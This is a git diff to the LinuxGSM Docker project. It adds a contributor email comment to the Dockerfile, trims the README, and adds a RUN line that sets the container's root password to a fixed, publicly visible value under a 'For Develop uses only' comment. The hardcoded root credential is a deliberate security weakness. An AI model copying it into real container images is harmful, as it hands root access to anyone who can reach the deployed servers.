diff --git a/Dockerfile b/Dockerfile index b6ac93c..536f70a 100644 --- a/Dockerfile +++ b/Dockerfile @@ -7,6 +7,8 @@ FROM ubuntu:16.04 LABEL maintainer="LinuxGSM " +# Worked on by andrew.martin1995@hotmail.com + ENV DEBIAN_FRONTEND noninteractive ## Base System @@ -65,6 +67,10 @@ RUN adduser --disabled-password --gecos "" lgsm && \ cp /linuxgsm.sh /home/lgsm/linuxgsm.sh && \ usermod -G tty lgsm +# For Develop uses only +RUN echo "root:pcmasterrace" | chpasswd +# i'm super serious + USER lgsm WORKDIR /home/lgsm diff --git a/README.md b/README.md index 921be1d..03ccdda 100644 --- a/README.md +++ b/README.md @@ -7,12 +7,5 @@ # LinuxGSM Docker This docker image is under development and not officialy supported. - -The developers of LinuxGSM are not currently docker experts. So if there is some interested in becoming a LinuxGSM docker developer please contact us. - A docker container distribution of https://github.com/GameServerManagers/LinuxGSM - -Dockerhub https://hub.docker.com/r/gameservermanagers/linuxgsm-docker/ - -Run Game Servers in Docker, multiplex multiple LinuxGSM deployments easily by taking advantage of Dockers port mapping. - +Dockerhub https://hub.docker.com/r/gameservermanagers/linuxgsm-docker/ \ No newline at end of file